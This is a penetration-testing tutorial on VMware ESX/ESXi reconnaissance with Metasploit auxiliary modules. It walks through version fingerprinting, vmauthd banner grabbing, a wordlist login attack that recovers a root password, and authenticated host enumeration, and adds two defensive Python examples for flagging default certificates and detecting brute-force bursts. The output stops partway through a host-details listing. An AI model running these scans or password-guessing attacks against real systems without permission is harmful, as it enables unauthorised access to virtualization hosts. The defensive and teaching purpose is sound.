Reconnaissance and Information Gathering Techniques against VMware Virtualization Systems

With the VMware auxiliary modules in the Metasploit Framework you can detect the VMware systems on the local network, identify VMware users and groups, and gather information about their privileges. You can also determine whether the host runs ESX or ESXi and obtain its version information.


To list all VMware-related auxiliary modules, use the following search command:

msf > search type:auxiliary vmware

Matching Modules
================

   Name                                                Disclosure Date  Rank    Description
   ----                                                ---------------  ----    -----------
   auxiliary/admin/vmware/poweroff_vm                                   normal  VMWare Power Off Virtual Machine
   auxiliary/admin/vmware/poweron_vm                                    normal  VMWare Power On Virtual Machine
   auxiliary/admin/vmware/tag_vm                                        normal  VMWare Tag Virtual Machine
   auxiliary/admin/vmware/terminate_esx_sessions                        normal  VMWare Terminate ESX Login Sessions
   auxiliary/scanner/http/vmware_server_dir_trav                        normal  VMware Server Directory Transversal Vulnerability
   auxiliary/scanner/vmware/esx_fingerprint                             normal  VMWare ESX/ESXi Fingerprint Scanner
   auxiliary/scanner/vmware/vmauthd_login                               normal  VMWare Authentication Daemon Login Scanner
   auxiliary/scanner/vmware/vmauthd_version                             normal  VMWare Authentication Daemon Version Scanner
   auxiliary/scanner/vmware/vmware_enum_permissions                     normal  VMWare Enumerate Permissions
   auxiliary/scanner/vmware/vmware_enum_sessions                        normal  VMWare Enumerate Active Sessions
   auxiliary/scanner/vmware/vmware_enum_users                           normal  VMWare Enumerate User Accounts
   auxiliary/scanner/vmware/vmware_enum_vms                             normal  VMWare Enumerate Virtual Machines
   auxiliary/scanner/vmware/vmware_host_details                         normal  VMWare Enumerate Host Details
   auxiliary/scanner/vmware/vmware_http_login                           normal  VMWare Web Login Scanner
   auxiliary/scanner/vmware/vmware_screenshot_stealer                   normal  VMWare Screenshot Stealer

Detailed information about any module is available through the info command:
msf > info auxiliary/scanner/vmware/esx_fingerprint

Name: VMWare ESX/ESXi Fingerprint Scanner
Module: auxiliary/scanner/vmware/esx_fingerprint
Version: $Revision$
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
TheLightCosine <thelightcosine@metasploit.com>

Basic options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    443              yes       The target port
   THREADS  1                yes       The number of concurrent threads
   URI      /sdk             no        The uri path to test against
   VHOST                     no        HTTP server virtual host

Description:
This module accesses the web API interfaces for VMware ESX/ESXi
servers and attempts to identify version information for that
server.

Walkthroughs:

Detecting the VMware systems on the network and their versions (esx_fingerprint)

msf > use auxiliary/scanner/vmware/esx_fingerprint
msf auxiliary(esx_fingerprint) > show options

Module options (auxiliary/scanner/vmware/esx_fingerprint):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    443              yes       The target port
   THREADS  1                yes       The number of concurrent threads
   URI      /sdk             no        The uri path to test against
   VHOST                     no        HTTP server virtual host

msf auxiliary(esx_fingerprint) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(esx_fingerprint) > run

[+] Identified VMware ESXi 4.1.0 build-260247
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Note: RHOSTS can be set to a single IP address (1.1.1.1), a subnet (1.1.1.0/8), or a file to read addresses from (file:/tmp/ip.lst).

The virtualization host was identified as running VMware ESXi 4.1.0.

VMWare Authentication Daemon Version Scanner (vmauthd_version)
This module connects to TCP port 902 and reports information about the target's authentication service.

msf > use auxiliary/scanner/vmware/vmauthd_version
msf auxiliary(vmauthd_version) > info

Name: VMWare Authentication Daemon Version Scanner
Module: auxiliary/scanner/vmware/vmauthd_version
Version: $Revision$
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
TheLightCosine <thelightcosine@metasploit.com>
hdm <hdm@metasploit.com>

Basic options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    902              yes       The target port
   THREADS  1                yes       The number of concurrent threads

Description:
This module will identify information about a host through the
vmauthd service.

msf auxiliary(vmauthd_version) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmauthd_version) > run

[*] 1.1.1.1:902 Switching to SSL connection…
[*] 1.1.1.1:902 Banner: 220 VMware Authentication Daemon Version 1.10: SSL Required, ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , VMXARGS supported Certificate:/C=US/ST=California/L=Palo Alto/O=VMware, Inc/OU=VMware ESX Server Default Certificate/emailAddress=ssl-certificates@vmware.com/CN=localhost.localdomain/unstructuredName=1295122519,564d7761726520496e632e
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
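The vmauthd greeting shown above packs several facts into one line: the daemon version, whether SSL is enforced, the console protocols, and the subject of the TLS certificate the host presents. The certificate in this capture is the install-time "VMware ESX Server Default Certificate" with CN=localhost.localdomain, which tells an asset owner that the host's TLS identity was never replaced. The following Python is an added example, not code from the original post or from Metasploit: it parses such banners into inventory rows and flags hosts still on the default certificate. Both sample banners are constructed; the first mirrors the page's capture, the second (with a hypothetical CN of esx01.example.internal) shows what a host with a properly issued certificate would return.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample banners (not captured from real hosts). The first
# mirrors the banner shape shown on the page, where the daemon presents
# the factory "VMware ESX Server Default Certificate"; the second is what
# a host with a properly issued certificate would present (hypothetical CN).
SAMPLE_BANNERS = [
    "220 VMware Authentication Daemon Version 1.10: SSL Required, "
    "ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , VMXARGS supported "
    "Certificate:/C=US/ST=California/L=Palo Alto/O=VMware, Inc"
    "/OU=VMware ESX Server Default Certificate"
    "/emailAddress=ssl-certificates@vmware.com/CN=localhost.localdomain"
    "/unstructuredName=1295122519,564d7761726520496e632e",
    "220 VMware Authentication Daemon Version 1.10: SSL Required, "
    "ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , VMXARGS supported "
    "Certificate:/C=TR/O=Example Corp/OU=Virtualization/CN=esx01.example.internal",
]

_VERSION_RE = re.compile(r"VMware Authentication Daemon Version ([\d.]+)")
_FIELD_RE = re.compile(r"(ServerDaemonProtocol|MKSDisplayProtocol):([A-Za-z0-9]+)")


@dataclass
class VmauthdBanner:
    version: str
    ssl_required: bool
    vmxargs: bool
    server_protocol: Optional[str]
    mks_protocol: Optional[str]
    cert_subject: Dict[str, str] = field(default_factory=dict)


def parse_banner(line: str) -> VmauthdBanner:
    """Split one vmauthd greeting into the daemon flags and the certificate subject."""
    if not line.startswith("220 "):
        raise ValueError("not a vmauthd greeting: %r" % line[:40])
    m = _VERSION_RE.search(line)
    if m is None:
        raise ValueError("no daemon version in banner")
    # Everything before "Certificate:" describes the daemon; everything after
    # it is the slash-separated X.509 subject.
    head, _, cert = line.partition("Certificate:")
    fields = dict(_FIELD_RE.findall(head))
    subject: Dict[str, str] = {}
    for part in cert.strip().split("/"):
        # Each RDN is key=value; the value may itself contain commas (O=VMware, Inc).
        if "=" in part:
            key, value = part.split("=", 1)
            subject[key.strip()] = value.strip()
    return VmauthdBanner(
        version=m.group(1),
        ssl_required="SSL Required" in head,
        vmxargs="VMXARGS supported" in head,
        server_protocol=fields.get("ServerDaemonProtocol"),
        mks_protocol=fields.get("MKSDisplayProtocol"),
        cert_subject=subject,
    )


def uses_default_certificate(b: VmauthdBanner) -> bool:
    """True when the host still presents the install-time self-signed certificate."""
    ou = b.cert_subject.get("OU", "")
    cn = b.cert_subject.get("CN", "")
    return "Default Certificate" in ou or cn == "localhost.localdomain"


def inventory(banners: List[str]) -> List[dict]:
    """Turn raw banners into inventory rows, flagging hosts with a weak TLS identity."""
    rows = []
    for raw in banners:
        b = parse_banner(raw)
        rows.append({
            "version": b.version,
            "cn": b.cert_subject.get("CN"),
            "ssl_required": b.ssl_required,
            "default_cert": uses_default_certificate(b),
        })
    return rows


if __name__ == "__main__":
    for row in inventory(SAMPLE_BANNERS):
        print(row)
```

Feed `inventory()` the banners collected from your own hosts (for example from the module output above) and every row with `default_cert` set to True is a host whose management certificate should be replaced with one issued by your own CA.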

VMWare Web Login Scan (vmware_http_login)
This module performs password guessing against the VMware authentication service; you can supply a wordlist file for this purpose.

msf > use auxiliary/scanner/vmware/vmware_http_login
msf auxiliary(vmware_http_login) > set PASS_FILE /root/pass.lst
PASS_FILE => /root/pass.lst
msf auxiliary(vmware_http_login) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmware_http_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(vmware_http_login) > run

[+] 1.1.1.1:443 – Identified VMware ESXi 4.1.0 build-260247
[-] 1.1.1.1:443 – Login Failure (root:)
[-] 1.1.1.1:443 – Login Failure (root:root)
[-] 1.1.1.1:443 – Login Failure (root:admin)
[-] 1.1.1.1:443 – Login Failure (root:password)
[-] 1.1.1.1:443 – Login Failure (root:123456)
[-] 1.1.1.1:443 – Login Failure (root:P@ssw0rd)
[+] 1.1.1.1:443 – Successful Login! (root:BenimGizliParolam)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
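The run above leaves a recognisable trace on the host side: a burst of failed logins for one account from one source, followed by a success. The following Python is an added example, not code from the original post or from Metasploit, showing how a defender can detect that pattern in an authentication event stream. The event lines are constructed in a simple "timestamp source user outcome" form for the example; they are not the real ESXi log format, so the parser would need adapting to whatever your log source actually emits.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

# Constructed sample events (generic "timestamp src user outcome" lines, not
# the actual ESXi log format). 192.0.2.10 reproduces the six-failures-then-
# success pattern from the run above; 192.0.2.25 is a user who mistyped once.
SAMPLE_EVENTS = """\
2012-01-30T17:10:01Z 192.0.2.10 root failure
2012-01-30T17:10:01Z 192.0.2.10 root failure
2012-01-30T17:10:02Z 192.0.2.10 root failure
2012-01-30T17:10:02Z 192.0.2.10 root failure
2012-01-30T17:10:02Z 192.0.2.10 root failure
2012-01-30T17:10:03Z 192.0.2.10 root failure
2012-01-30T17:10:03Z 192.0.2.10 root success
2012-01-30T17:12:00Z 192.0.2.25 admin failure
2012-01-30T17:12:09Z 192.0.2.25 admin success
"""

Event = Tuple[datetime, str, str, str]
Alert = Tuple[str, str, str, int]


def parse_events(text: str) -> List[Event]:
    """Parse the constructed event lines into (timestamp, source, user, outcome)."""
    events: List[Event] = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, src, user, outcome = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, user, outcome))
    return events


def detect_brute_force(events: List[Event], threshold: int = 5,
                       window_seconds: int = 60,
                       burst_before_success: int = 3) -> List[Alert]:
    """Sliding-window failure counter per (source, user).

    Emits "brute_force" once a (source, user) pair reaches `threshold`
    failures inside the window, and "success_after_failures" when a login
    succeeds while at least `burst_before_success` recent failures are
    still in the window. The second alert is the one worth paging on:
    it means the guessing worked.
    """
    alerts: List[Alert] = []
    failures: Dict[Tuple[str, str], Deque[datetime]] = defaultdict(deque)
    fired = set()
    for ts, src, user, outcome in sorted(events, key=lambda e: e[0]):
        key = (src, user)
        q = failures[key]
        cutoff = ts - timedelta(seconds=window_seconds)
        while q and q[0] < cutoff:
            q.popleft()  # drop failures that fell out of the window
        if outcome == "failure":
            q.append(ts)
            if len(q) >= threshold and key not in fired:
                alerts.append(("brute_force", src, user, len(q)))
                fired.add(key)  # alert once per pair, not on every extra failure
        elif outcome == "success":
            if len(q) >= burst_before_success:
                alerts.append(("success_after_failures", src, user, len(q)))
            q.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_brute_force(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

With the defaults, the sample produces a brute_force alert at the fifth failure for root from 192.0.2.10 and a success_after_failures alert when the seventh attempt succeeds; the single mistake by admin produces nothing. Tune `threshold` and `window_seconds` to your environment's normal failure rate, and lower `burst_before_success` if you would rather see every success preceded by any failure at all.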

Retrieving Detailed Information about the VMWare Host (vmware_host_details)

Once login credentials have been obtained, detailed information about the VMWare system can be retrieved with this auxiliary module.

msf > use auxiliary/scanner/vmware/vmware_host_details
msf auxiliary(vmware_host_details) > set RHOSTS 1.1.1.1
RHOSTS => 1.1.1.1
msf auxiliary(vmware_host_details) > set PASSWORD BenimGizliParolam
PASSWORD => BenimGizliParolam
msf auxiliary(vmware_host_details) > set HW_DETAILS true
HW_DETAILS => true
msf auxiliary(vmware_host_details) > run

[+] VMWare Host at 1.1.1.1 details
-----------------------------

- ha-host:
    hardware:
      vendor: System manufacturer
      model: System Product Name
      uuid: 8065001e-8c00-00df-2315-bcaec504ad78
      otherIdentifyingInfo:
        identifierValue: ! ' Asset-1234567890'
        identifierType:
          label: AssetTag
          summary: AssetTag
          key: AssetTag
      memorySize: '16909213696'
      cpuModel: AMD Phenom(tm) II X4 965 Processor
      cpuMhz: '3411'
      numCpuPkgs: '1'
      numCpuCores: '4'
      numCpuThreads: '4'
      numNics: '1'
      numHBAs: '8'
    runtime:
      connectionState: connected
      powerState: poweredOn
      inMaintenanceMode: 'false'
      bootTime: '2012-01-30T17:08:58.847297Z'
    config:
      name: localhost.
      port: '902'
      product:

Author:

Ozan UÇAR
ozan.ucar@bga.com.tr